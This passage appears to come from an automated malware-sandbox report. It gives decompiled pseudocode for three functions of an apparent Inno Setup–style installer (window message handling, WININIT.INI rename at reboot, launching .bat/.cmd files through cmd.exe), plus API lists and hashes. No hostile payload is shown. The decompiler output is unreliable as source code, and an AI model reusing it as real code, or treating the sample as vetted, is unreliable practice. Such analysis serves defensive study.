                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                                    • Instruction ID: 5d66737b0d4da92f98c0db807105cf356bd4b4b1c4874a50b8b8aa415a59ee3b
                                                                    • Opcode Fuzzy Hash: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                                    • Instruction Fuzzy Hash: D1C134A2710A004BD714AB7D9C8476FB286DBC5324F19823FE645EB3D6DA7CCC558B88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006158C4, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 239windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 62%
                                                                    			E006158C4(void* __ebx, int* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				int* _v16;
				char _v144;
				intOrPtr _v148;
				void* _v152;
				intOrPtr _v156;
				char _v168;
				char _v172;
				void* _t51;
				intOrPtr* _t57;
				intOrPtr* _t62;
				intOrPtr* _t65;
				intOrPtr* _t71;
				intOrPtr _t77;
				void* _t104;
				void* _t107;
				int* _t108;
				struct HWND__* _t118;
				int _t122;
				intOrPtr _t152;
				intOrPtr _t156;
				intOrPtr _t157;
				intOrPtr _t162;
				struct HWND__* _t163;
				intOrPtr _t164;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t169;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t181;
				void* _t182;
				intOrPtr _t183;
				void* _t189;

				_t189 = __fp0;
				_t179 = __esi;
				_t178 = __edi;
				_t181 = _t182;
				_t183 = _t182 + 0xffffff58;
				_push(__esi);
				_push(__edi);
				_v172 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = __edx;
				_push(_t181);
				_push(0x615c7e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t183;
				_push(_t181);
				_push(0x615c40);
				_push( *[fs:edx]);
				 *[fs:edx] = _t183;
				_t122 =  *_v16;
				_t51 = _t122 - 0x4a;
				if(_t51 == 0) {
					_t53 = _v16[2];
					_t152 =  *(_v16[2]) - 0x800;
					__eflags = _t152;
					if(__eflags == 0) {
						_push(_t181);
						_push(0x615a6b);
						_push( *[fs:edx]);
						 *[fs:edx] = _t183;
						E0040A350( &_v8,  *(_t53 + 4) >> 1,  *((intOrPtr*)(_t53 + 8)), __eflags);
						_push(_t181);
						_push(0x615a29);
						_push( *[fs:eax]);
						 *[fs:eax] = _t183;
						_t57 =  *0x6cd8cc; // 0x6d681c
						 *_t57 =  *_t57 + 1;
						_push(_t181);
						_push(0x615a0e);
						_push( *[fs:eax]);
						 *[fs:eax] = _t183;
						L006ABD3C(_v8,  *(_t53 + 4) >> 1,  &_v12);
						_pop(_t156);
						 *[fs:eax] = _t156;
						_push(E00615A15);
						_t62 =  *0x6cd8cc; // 0x6d681c
						 *_t62 =  *_t62 - 1;
						__eflags =  *_t62;
						return _t62;
					} else {
						_t157 = _t152 - 1;
						__eflags = _t157;
						if(_t157 == 0) {
							_push(_t181);
							_push(0x615b61);
							_push( *[fs:edx]);
							 *[fs:edx] = _t183;
							E0040714C( *((intOrPtr*)(_t53 + 8)), _t122, 0x98,  &_v168);
							_push(_t181);
							_push(0x615b1f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t183;
							_t65 =  *0x6cdb4c; // 0x6d682c
							__eflags =  *_t65;
							if( *_t65 == 0) {
								E00429008(L"Cannot evaluate variable because [Code] isn\'t running yet", 1);
								E004098C4();
							}
							E0040A998( &_v172, 0x80,  &_v144, 0);
							_t71 =  *0x6cdb4c; // 0x6d682c
							E006A3E88( *_t71, _t122, _v156, _t178, _t179, _t189,  &_v12, _v172, _v148);
							_v16[3] = 1;
							_pop(_t162);
							 *[fs:eax] = _t162;
							_t163 =  *0x6d62f8; // 0x0
							_t77 =  *0x6d62f4; // 0x0
							E005D6064(_t77, _t122, _t163, _t178, _t179, _v12);
							_pop(_t164);
							 *[fs:eax] = _t164;
						} else {
							_t169 = _t157 - 1;
							__eflags = _t169;
							if(_t169 == 0) {
								_push(_t181);
								_push(0x615bb7);
								_push( *[fs:edx]);
								 *[fs:edx] = _t183;
								E0040A1EC(0x6d62e8);
								E0040A3A4(0x6d62e8,  *(_v16[2] + 4) >> 0,  *((intOrPtr*)(_v16[2] + 8)), __eflags, 0);
								_v16[3] = 1;
								_pop(_t172);
								 *[fs:eax] = _t172;
							} else {
								__eflags = _t169 == 1;
								if(_t169 == 1) {
									_push(_t181);
									_push(0x615c0a);
									_push( *[fs:edx]);
									 *[fs:edx] = _t183;
									E0040A1EC(0x6d62ec);
									E0040A3A4(0x6d62ec,  *(_v16[2] + 4) >> 0,  *((intOrPtr*)(_v16[2] + 8)), __eflags, 0);
									_v16[3] = 1;
									_pop(_t176);
									 *[fs:eax] = _t176;
								}
							}
						}
						goto L21;
					}
				} else {
					_t104 = _t51 - 0xbb6;
					if(_t104 == 0) {
						 *0x6d62e4 = 0;
						 *0x6d62f4 = 0;
						 *0x6d62fc = 1;
						 *0x6d62fd = 0;
						PostMessageW(0, 0, 0, 0);
					} else {
						_t107 = _t104 - 1;
						if(_t107 == 0) {
							 *0x6d62fc = 1;
							_t108 = _v16;
							__eflags =  *((intOrPtr*)(_t108 + 4)) - 1;
							 *0x6d62fd =  *((intOrPtr*)(_t108 + 4)) == 1;
							PostMessageW(0, 0, 0, 0);
						} else {
							if(_t107 == 2) {
								SetForegroundWindow(_v16[1]);
							} else {
								_t118 =  *0x6d62f8; // 0x0
								_v16[3] = DefWindowProcW(_t118, _t122, _v16[1], _v16[2]);
							}
						}
					}
					L21:
					_pop(_t165);
					 *[fs:eax] = _t165;
					_pop(_t166);
					 *[fs:eax] = _t166;
					_push(E00615C85);
					E0040A1EC( &_v172);
					return E0040A228( &_v12, 2);
				}
			}






































                                                                    0x006158c4
                                                                    0x006158c4
                                                                    0x006158c4
                                                                    0x006158c5
                                                                    0x006158c7
                                                                    0x006158ce
                                                                    0x006158cf
                                                                    0x006158d2
                                                                    0x006158d8
                                                                    0x006158db
                                                                    0x006158de
                                                                    0x006158e3
                                                                    0x006158e4
                                                                    0x006158e9
                                                                    0x006158ec
                                                                    0x006158f1
                                                                    0x006158f2
                                                                    0x006158f7
                                                                    0x006158fa
                                                                    0x00615900
                                                                    0x00615904
                                                                    0x00615907
                                                                    0x00615986
                                                                    0x0061598b
                                                                    0x0061598b
                                                                    0x00615991
                                                                    0x006159af
                                                                    0x006159b0
                                                                    0x006159b5
                                                                    0x006159b8
                                                                    0x006159c6
                                                                    0x006159cd
                                                                    0x006159ce
                                                                    0x006159d3
                                                                    0x006159d6
                                                                    0x006159d9
                                                                    0x006159de
                                                                    0x006159e2
                                                                    0x006159e3
                                                                    0x006159e8
                                                                    0x006159eb
                                                                    0x006159f4
                                                                    0x006159fb
                                                                    0x006159fe
                                                                    0x00615a01
                                                                    0x00615a06
                                                                    0x00615a0b
                                                                    0x00615a0b
                                                                    0x00615a0d
                                                                    0x00615993
                                                                    0x00615993
                                                                    0x00615993
                                                                    0x00615994
                                                                    0x00615a7c
                                                                    0x00615a7d
                                                                    0x00615a82
                                                                    0x00615a85
                                                                    0x00615a96
                                                                    0x00615a9d
                                                                    0x00615a9e
                                                                    0x00615aa3
                                                                    0x00615aa6
                                                                    0x00615aa9
                                                                    0x00615aae
                                                                    0x00615ab1
                                                                    0x00615abf
                                                                    0x00615ac4
                                                                    0x00615ac4
                                                                    0x00615ae3
                                                                    0x00615af3
                                                                    0x00615b06
                                                                    0x00615b0e
                                                                    0x00615b17
                                                                    0x00615b1a
                                                                    0x00615b44
                                                                    0x00615b4a
                                                                    0x00615b4f
                                                                    0x00615b56
                                                                    0x00615b59
                                                                    0x0061599a
                                                                    0x0061599a
                                                                    0x0061599a
                                                                    0x0061599b
                                                                    0x00615b72
                                                                    0x00615b73
                                                                    0x00615b78
                                                                    0x00615b7b
                                                                    0x00615b83
                                                                    0x00615b9e
                                                                    0x00615ba6
                                                                    0x00615baf
                                                                    0x00615bb2
                                                                    0x006159a1
                                                                    0x006159a1
                                                                    0x006159a2
                                                                    0x00615bc5
                                                                    0x00615bc6
                                                                    0x00615bcb
                                                                    0x00615bce
                                                                    0x00615bd6
                                                                    0x00615bf1
                                                                    0x00615bf9
                                                                    0x00615c02
                                                                    0x00615c05
                                                                    0x00615c05
                                                                    0x006159a2
                                                                    0x0061599b
                                                                    0x00000000
                                                                    0x00615994
                                                                    0x00615909
                                                                    0x00615909
                                                                    0x0061590e
                                                                    0x0061591d
                                                                    0x00615926
                                                                    0x0061592b
                                                                    0x00615932
                                                                    0x00615941
                                                                    0x00615910
                                                                    0x00615910
                                                                    0x00615911
                                                                    0x0061594b
                                                                    0x00615952
                                                                    0x00615955
                                                                    0x00615959
                                                                    0x00615968
                                                                    0x00615913
                                                                    0x00615916
                                                                    0x00615979
                                                                    0x00615918
                                                                    0x00615c25
                                                                    0x00615c33
                                                                    0x00615c33
                                                                    0x00615916
                                                                    0x00615911
                                                                    0x00615c36
                                                                    0x00615c38
                                                                    0x00615c3b
                                                                    0x00615c5a
                                                                    0x00615c5d
                                                                    0x00615c60
                                                                    0x00615c6b
                                                                    0x00615c7d
                                                                    0x00615c7d

                                                                    APIs
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615941
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615968
                                                                    • SetForegroundWindow.USER32(?,00000000,00615C40,?,00000000,00615C7E), ref: 00615979
                                                                    • DefWindowProcW.USER32(00000000,?,?,?,00000000,00615C40,?,00000000,00615C7E), ref: 00615C2B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessagePostWindow$ForegroundProc
                                                                    • String ID: ,hm$Cannot evaluate variable because [Code] isn't running yet
                                                                    • API String ID: 602442252-4088602279
                                                                    • Opcode ID: 035c484aa870e85df39017a6846f67cb24ba4c1d627fefdd11be8a5083181655
                                                                    • Instruction ID: a4d9e41ba68ff62660f6698438dd6fdd69331843db6522f8d42236939986de27
                                                                    • Opcode Fuzzy Hash: 035c484aa870e85df39017a6846f67cb24ba4c1d627fefdd11be8a5083181655
                                                                    • Instruction Fuzzy Hash: F691BC34A04704EFD711DF69D8A1F99FBB6EB89700F19C4AAF8059B7A1C634AD80CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060D8B0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E0060D8B0(char __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v41;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				void* __ecx;
				char _t90;
				char _t167;
				char _t168;
				intOrPtr _t171;
				intOrPtr _t179;
				intOrPtr _t186;
				intOrPtr _t207;
				intOrPtr _t217;
				intOrPtr _t218;

				_t215 = __esi;
				_t214 = __edi;
				_t217 = _t218;
				_t171 = 8;
				goto L1;
				L4:
				if(E005C77E8() != 0) {
					__eflags = _t167;
					if(__eflags == 0) {
						E0060D650(_v8, _t167,  &_v68, _t214, _t215, __eflags);
						E0040A5F0( &_v8, _v68);
						__eflags = _v12;
						if(__eflags != 0) {
							E0060D650(_v12, _t167,  &_v72, _t214, _t215, __eflags);
							E0040A5F0( &_v12, _v72);
						}
					}
					_t90 = E0060C558(_t167, _v12, _v8, 5);
					__eflags = _t90;
					if(_t90 == 0) {
						E0060CE84(L"MoveFileEx");
					}
					__eflags = 0;
					_pop(_t186);
					 *[fs:eax] = _t186;
					_push(E0060DBD9);
					E0040A228( &_v72, 7);
					return E0040A228( &_v32, 7);
				} else {
					E005C7430( &_v16);
					E005C4EA4(_v16,  &_v56);
					E0040B4C8( &_v20, L"WININIT.INI", _v56);
					E0060D294(0, _t167, L".tmp", _v16, _t214, _t215,  &_v24);
					_push(_t217);
					_push(0x60db3e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t218;
					_v36 = 0;
					_v40 = 0;
					_push(_t217);
					_push(0x60dae2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t218;
					WritePrivateProfileStringW(0, 0, 0, E0040B278(_v20));
					_v36 = E005CBFB8(1, 1, 0, 3);
					_t179 = _v24;
					_v40 = E005CBFB8(1, 0, 1, 0);
					_v41 = 0;
					_t168 = 0;
					while(E005CC258(_v36) == 0) {
						E005CC268(_v36, _t168,  &_v28, _t214, _t215, __eflags);
						E004225EC(_v28, 1,  &_v32, _t215);
						__eflags = _v32;
						if(__eflags == 0) {
							L11:
							E005CC5A0(_v40, 1, _v28, _t215, __eflags);
							_t168 = 0;
							__eflags = 0;
							continue;
						} else {
							__eflags =  *_v32 - 0x5b;
							if(__eflags != 0) {
								goto L11;
							} else {
								__eflags = E00422368(_v32, _t179, L"[rename]");
								if(__eflags != 0) {
									__eflags = _v41;
									if(__eflags == 0) {
										goto L11;
									}
								} else {
									_v41 = 1;
									goto L11;
								}
							}
						}
						break;
					}
					_t223 = _v41;
					if(_v41 == 0) {
						E005CC5A0(_v40, _t168, L"[rename]", _t215, _t223);
					}
					_t224 = _v12;
					if(_v12 == 0) {
						E0040A5F0( &_v32, 0x60dc48);
					} else {
						E005C73D8(_v12, _t179,  &_v32, _t224);
					}
					_push(_v32);
					_push(0x60dc5c);
					E005C73D8(_v8, _t179,  &_v64, _t224);
					_push(_v64);
					E0040B550( &_v60, _t168, 3, _t214, _t215);
					E005CC5A0(_v40, _t168, _v60, _t215, _t224);
					_t225 = _t168;
					if(_t168 != 0) {
						E005CC5A0(_v40, _t168, _v28, _t215, _t225);
					}
					while(E005CC258(_v36) == 0) {
						E005CC268(_v36, _t168,  &_v28, _t214, _t215, __eflags);
						E005CC5A0(_v40, _t168, _v28, _t215, __eflags);
					}
					_pop(_t207);
					 *[fs:eax] = _t207;
					_push(E0060DAE9);
					E00408444(_v40);
					return E00408444(_v36);
				}
				L1:
				_push(0);
				_push(0);
				_t171 = _t171 - 1;
				if(_t171 != 0) {
					goto L1;
				} else {
					_t1 =  &_v8;
					 *_t1 = _t171;
					_push(__esi);
					_push(__edi);
					_v12 =  *_t1;
					_v8 = __edx;
					_t167 = __eax;
					E0040A2AC(_v8);
					E0040A2AC(_v12);
					_push(_t217);
					_push(0x60dbd2);
					 *[fs:eax] = _t218;
					E005C52C8(_v8,  &_v48, _t217,  *[fs:eax]);
					E0040A5F0( &_v8, _v48);
					if(_v12 != 0) {
						E005C52C8(_v12,  &_v52, _t217);
						E0040A5F0( &_v12, _v52);
					}
				}
				goto L4;
			}






























                                                                    0x0060d8b0
                                                                    0x0060d8b0
                                                                    0x0060d8b1
                                                                    0x0060d8b4
                                                                    0x0060d8b4
                                                                    0x0060d91e
                                                                    0x0060d925
                                                                    0x0060db57
                                                                    0x0060db59
                                                                    0x0060db61
                                                                    0x0060db6c
                                                                    0x0060db71
                                                                    0x0060db75
                                                                    0x0060db7d
                                                                    0x0060db88
                                                                    0x0060db88
                                                                    0x0060db75
                                                                    0x0060db97
                                                                    0x0060db9c
                                                                    0x0060db9e
                                                                    0x0060dba5
                                                                    0x0060dba5
                                                                    0x0060dbaa
                                                                    0x0060dbac
                                                                    0x0060dbaf
                                                                    0x0060dbb2
                                                                    0x0060dbbf
                                                                    0x0060dbd1
                                                                    0x0060d92b
                                                                    0x0060d92e
                                                                    0x0060d939
                                                                    0x0060d949
                                                                    0x0060d95c
                                                                    0x0060d963
                                                                    0x0060d964
                                                                    0x0060d969
                                                                    0x0060d96c
                                                                    0x0060d971
                                                                    0x0060d976
                                                                    0x0060d97b
                                                                    0x0060d97c
                                                                    0x0060d981
                                                                    0x0060d984
                                                                    0x0060d996
                                                                    0x0060d9b0
                                                                    0x0060d9b9
                                                                    0x0060d9c8
                                                                    0x0060d9cb
                                                                    0x0060d9cf
                                                                    0x0060da24
                                                                    0x0060d9d9
                                                                    0x0060d9e6
                                                                    0x0060d9eb
                                                                    0x0060d9ef
                                                                    0x0060da17
                                                                    0x0060da1d
                                                                    0x0060da22
                                                                    0x0060da22
                                                                    0x00000000
                                                                    0x0060d9f1
                                                                    0x0060d9f4
                                                                    0x0060d9f8
                                                                    0x00000000
                                                                    0x0060d9fa
                                                                    0x0060da07
                                                                    0x0060da09
                                                                    0x0060da11
                                                                    0x0060da15
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0060da0b
                                                                    0x0060da0b
                                                                    0x00000000
                                                                    0x0060da0b
                                                                    0x0060da09
                                                                    0x0060d9f8
                                                                    0x00000000
                                                                    0x0060d9ef
                                                                    0x0060da30
                                                                    0x0060da34
                                                                    0x0060da3e
                                                                    0x0060da3e
                                                                    0x0060da43
                                                                    0x0060da47
                                                                    0x0060da5e
                                                                    0x0060da49
                                                                    0x0060da4f
                                                                    0x0060da4f
                                                                    0x0060da63
                                                                    0x0060da66
                                                                    0x0060da71
                                                                    0x0060da76
                                                                    0x0060da81
                                                                    0x0060da8c
                                                                    0x0060da91
                                                                    0x0060da93
                                                                    0x0060da9b
                                                                    0x0060da9b
                                                                    0x0060dab8
                                                                    0x0060daa8
                                                                    0x0060dab3
                                                                    0x0060dab3
                                                                    0x0060dac6
                                                                    0x0060dac9
                                                                    0x0060dacc
                                                                    0x0060dad4
                                                                    0x0060dae1
                                                                    0x0060dae1
                                                                    0x0060d8b9
                                                                    0x0060d8b9
                                                                    0x0060d8bb
                                                                    0x0060d8bd
                                                                    0x0060d8be
                                                                    0x00000000
                                                                    0x0060d8c0
                                                                    0x0060d8c0
                                                                    0x0060d8c0
                                                                    0x0060d8c4
                                                                    0x0060d8c5
                                                                    0x0060d8c6
                                                                    0x0060d8c9
                                                                    0x0060d8cc
                                                                    0x0060d8d1
                                                                    0x0060d8d9
                                                                    0x0060d8e0
                                                                    0x0060d8e1
                                                                    0x0060d8e9
                                                                    0x0060d8f2
                                                                    0x0060d8fd
                                                                    0x0060d906
                                                                    0x0060d90e
                                                                    0x0060d919
                                                                    0x0060d919
                                                                    0x0060d906
                                                                    0x00000000

                                                                    APIs
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringWrite
                                                                    • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                    • API String ID: 390214022-3304407042
                                                                    • Opcode ID: 1516e58ba1303ba12e62d3941270339ebbfe120b0d1e0e5f83981064806d38df
                                                                    • Instruction ID: 9ccae61fee5444c96898e798bd08ad00ad1f0a42c005b5ee0ec7678d9f590d11
                                                                    • Opcode Fuzzy Hash: 1516e58ba1303ba12e62d3941270339ebbfe120b0d1e0e5f83981064806d38df
                                                                    • Instruction Fuzzy Hash: 3E810974A44209AFDB04EBE5C882BDEBBB6EF88304F504669E400B73D1E775AE45CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060F06C, Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 157COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 53%
                                                                    			E0060F06C(signed char __eax, void* __ebx, char __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4, void* _a8, signed short _a12, signed char _a16, char _a20) {
				char _v8;
				signed char _v9;
				short _v32;
				intOrPtr _v36;
				char _v80;
				void* _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t75;
				intOrPtr _t107;
				char _t114;
				intOrPtr _t132;
				void* _t142;
				intOrPtr* _t144;
				void* _t147;

				_t116 = __ecx;
				_v116 = 0;
				_v120 = 0;
				_v108 = 0;
				_v112 = 0;
				_v104 = 0;
				_v100 = 0;
				_v8 = 0;
				_t114 = __ecx;
				_t142 = __edx;
				_v9 = __eax;
				_t144 = _a4;
				E0040A2AC(_a20);
				_push(_t147);
				_push(0x60f26e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147 + 0xffffff8c;
				E0040B660(_t142, 0x60f28c);
				if(0 != 0) {
					_push(0x60f29c);
					_push(_t142);
					_push(0x60f29c);
					E0040B550( &_v8, _t114, 3, _t142, _t144);
					__eflags = _t114;
					if(_t114 != 0) {
						_push(_v8);
						_push(0x60f2ac);
						_push(_t114);
						E0040B550( &_v8, _t114, 3, _t142, _t144);
					}
					E005C53D0(_t142,  &_v100);
					_t63 = E00422368(_v100, _t116, L".bat");
					__eflags = _t63;
					if(_t63 == 0) {
						L6:
						_t64 = E005C77E8();
						__eflags = _t64;
						if(_t64 == 0) {
							_push(0x60f29c);
							E005C7430( &_v120);
							E005C4EA4(_v120,  &_v116);
							_push(_v116);
							_push(L"COMMAND.COM\" /C ");
							_push(_v8);
							E0040B550( &_v8, _t114, 4, _t142, _t144);
						} else {
							_push(0x60f29c);
							E005C745C( &_v112);
							E005C4EA4(_v112,  &_v108);
							_push(_v108);
							_push(L"cmd.exe\" /C \"");
							_push(_v8);
							_push(0x60f29c);
							E0040B550( &_v8, _t114, 5, _t142, _t144);
						}
						goto L9;
					} else {
						E005C53D0(_t142,  &_v104);
						_t107 = E00422368(_v104, _t116, L".cmd");
						__eflags = _t107;
						if(_t107 != 0) {
							L9:
							__eflags = _a20;
							if(_a20 == 0) {
								E005C5378(_t142, _t116,  &_a20);
							}
							goto L11;
						}
						goto L6;
					}
				} else {
					E0040A5F0( &_v8, _t114);
					L11:
					E00407760( &_v80, 0x44);
					_v80 = 0x44;
					_v36 = 1;
					_v32 = _a12 & 0x0000ffff;
					_t150 = _a20;
					if(_a20 == 0) {
						E005C745C( &_a20);
					}
					_t75 = E0040B278(_a20);
					E0060C038(_v9 & 0x000000ff, E0040B278(_v8), 0, _t150,  &_v96,  &_v80, _t75, 0, 0x4000000, 0, 0, 0);
					asm("sbb ebx, ebx");
					_t115 = _t114 + 1;
					if(_t114 + 1 != 0) {
						CloseHandle(_v92);
						E0060EFD8(_v96, _t115, _a16 & 0x000000ff, _t142, _t144, _t144);
					} else {
						 *_t144 = GetLastError();
					}
					_pop(_t132);
					 *[fs:eax] = _t132;
					_push(E0060F275);
					E0040A228( &_v120, 6);
					E0040A1C8( &_v8);
					return E0040A1C8( &_a20);
				}
			}

























                                                                    0x0060f06c
                                                                    0x0060f077
                                                                    0x0060f07a
                                                                    0x0060f07d
                                                                    0x0060f080
                                                                    0x0060f083
                                                                    0x0060f086
                                                                    0x0060f089
                                                                    0x0060f08c
                                                                    0x0060f08e
                                                                    0x0060f090
                                                                    0x0060f093
                                                                    0x0060f099
                                                                    0x0060f0a0
                                                                    0x0060f0a1
                                                                    0x0060f0a6
                                                                    0x0060f0a9
                                                                    0x0060f0b3
                                                                    0x0060f0b8
                                                                    0x0060f0c9
                                                                    0x0060f0ce
                                                                    0x0060f0cf
                                                                    0x0060f0dc
                                                                    0x0060f0e1
                                                                    0x0060f0e3
                                                                    0x0060f0e5
                                                                    0x0060f0e8
                                                                    0x0060f0ed
                                                                    0x0060f0f6
                                                                    0x0060f0f6
                                                                    0x0060f100
                                                                    0x0060f10d
                                                                    0x0060f112
                                                                    0x0060f114
                                                                    0x0060f131
                                                                    0x0060f131
                                                                    0x0060f136
                                                                    0x0060f138
                                                                    0x0060f171
                                                                    0x0060f179
                                                                    0x0060f184
                                                                    0x0060f189
                                                                    0x0060f18c
                                                                    0x0060f191
                                                                    0x0060f19c
                                                                    0x0060f13a
                                                                    0x0060f13a
                                                                    0x0060f142
                                                                    0x0060f14d
                                                                    0x0060f152
                                                                    0x0060f155
                                                                    0x0060f15a
                                                                    0x0060f15d
                                                                    0x0060f16a
                                                                    0x0060f16a
                                                                    0x00000000
                                                                    0x0060f116
                                                                    0x0060f11b
                                                                    0x0060f128
                                                                    0x0060f12d
                                                                    0x0060f12f
                                                                    0x0060f1a1
                                                                    0x0060f1a1
                                                                    0x0060f1a5
                                                                    0x0060f1ac
                                                                    0x0060f1ac
                                                                    0x00000000
                                                                    0x0060f1a5
                                                                    0x00000000
                                                                    0x0060f12f
                                                                    0x0060f0ba
                                                                    0x0060f0bf
                                                                    0x0060f1b1
                                                                    0x0060f1bb
                                                                    0x0060f1c0
                                                                    0x0060f1c7
                                                                    0x0060f1d2
                                                                    0x0060f1d6
                                                                    0x0060f1da
                                                                    0x0060f1df
                                                                    0x0060f1df
                                                                    0x0060f1f4
                                                                    0x0060f212
                                                                    0x0060f21a
                                                                    0x0060f21c
                                                                    0x0060f21f
                                                                    0x0060f22e
                                                                    0x0060f23e
                                                                    0x0060f221
                                                                    0x0060f226
                                                                    0x0060f226
                                                                    0x0060f245
                                                                    0x0060f248
                                                                    0x0060f24b
                                                                    0x0060f258
                                                                    0x0060f260
                                                                    0x0060f26d
                                                                    0x0060f26d

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0060F29C,0060F29C,?,0060F29C,00000000), ref: 0060F221
                                                                    • CloseHandle.KERNEL32(006B7E1B,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0060F29C,0060F29C,?,0060F29C), ref: 0060F22E
                                                                      • Part of subcall function 0060EFD8: WaitForInputIdle.USER32 ref: 0060F004
                                                                      • Part of subcall function 0060EFD8: MsgWaitForMultipleObjects.USER32 ref: 0060F026
                                                                      • Part of subcall function 0060EFD8: GetExitCodeProcess.KERNEL32 ref: 0060F037
                                                                      • Part of subcall function 0060EFD8: CloseHandle.KERNEL32(00000001,0060F064,0060F05D,?,?,?,00000001,?,?,0060F406,?,00000000,0060F41C,?,?,?), ref: 0060F057
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
